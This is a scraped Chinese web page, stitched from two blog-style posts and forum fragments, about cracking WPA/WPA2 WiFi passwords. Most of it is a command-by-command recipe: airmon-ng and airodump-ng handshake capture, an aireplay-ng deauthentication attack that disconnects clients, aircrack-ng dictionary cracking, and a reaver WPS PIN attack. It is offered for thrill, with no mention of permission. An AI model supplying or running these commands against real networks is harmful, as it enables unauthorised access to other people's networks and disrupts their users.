wifi 四次握手PJ 已经获取握手包,求大侠帮忙跑下字典

  总的来说,现在wifi应该是不容易破解的,完全靠密码字典,一般稍复杂的中英混合的话,基本很难破解。当然,把所有密码都尝试一遍那种暴力方法,当然是可以破解的,但这个密码数量,估计一般的电脑,没个几年估计也跑不完吧。
  但是呢,很多时候,我们设置密码其实都是有一定规律的,如名字首字母加数字组合,姓氏加数字等等。所以其实还是有希望的对不对,至少对部分来说是这样的。
  基本上所有的破解方式都是通过这两步完成。
    1、获取握手包,即有设置与路由连接时候的握手包。
    2、跑密码字典。
  一、获取握手包,
    通过CommView for WiFi 来抓取,开始&Capture 以后,等待一段时间,把抓取到的包导出成wireshark tcpdump文件.
  二、使用&aircrack-ng 解析包,并验证密码
    使用命令&aircrack-ng &wifi.pcap -w password.txt
  三、查看是否有握手包,没有的话继续抓,有的话,那就跑字典,等着就好了。
  其实呢,做这些也只是因为刺激,并没有任何其他想法,因为每个程序员,应该都有那么一个黑客梦!
阅读(...) 评论()生活累,一小半源于生存,一大半源于攀比。
联系邮箱:
最近更新随机文章热评文章最新文章
打赏随性情wifi密码破解方法记录 - 简书
wifi密码破解方法记录
wifi加密方式
1.不启用安全????2.WEP???3.WPA/WPA2-PSK(预共享密钥)???4.WPA/WPA2 802.1X (radius认证)
WEP??加密方式的破解
wep加密方式99.99%可以破解(排除0.01%的人品问题),所以基本已经绝迹了,这里就不过多描述。如果真遇到此奇葩加密方式,可以参考这里
WPA/WPA2-PSK加密方式的破解
使用Aircrack-ng工具,依次输入以下命令防止设备繁忙1.airmon-ng check kill查看无线网卡状态2.ifconfig/iwconfig/ifconfig -a加载无线网卡,已加载则忽略3.ifconfig wlan0 up激活网卡4.airmon-ng start wlan0探测无线网络5.airodump-ng mon0
如果出现“Device or resource busy”错误,请参考 airodump-ng常用参数:--wps、--essid、-c、-bssid
开始抓包6.airodump-ng --ivs -w finame -c 6 mon0
ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w finame mon0
deauth攻击,获取握手包7.aireplay-ng -0 大小 -a 主机mac -c 客户端mac mon0
攻击时网卡必须和需要破解的wifi在同一频道。deauth攻击为了获得握手包,会让链接的客户端断开。如果出现“interfaceX is on channel Y, but the AP uses channel Z”,请输入:sudo iwconfig wlan0 channel wifi的频道
跑字典破解8.aircrack-ng -w password.lst finame-01.cap
本机测试时,大约为1.6k/s。也就是1分钟跑9.6万条密码。跑完字典大概40多分钟(字典比较小,共有3741905条密码)
利用路由器wps功能漏洞,跑pin码破解
输入命令reaver -i mon0 -b MAC地址 -a -S -vv -d1 -t 3 -c 1
彩虹表破解
使用GPU加速破解
1.2.3.4.5.6.7.8.9.
不会游泳的程序猿不是好厨师

我要回帖

更多关于 wifi握手包抓取工具 的文章

 

随机推荐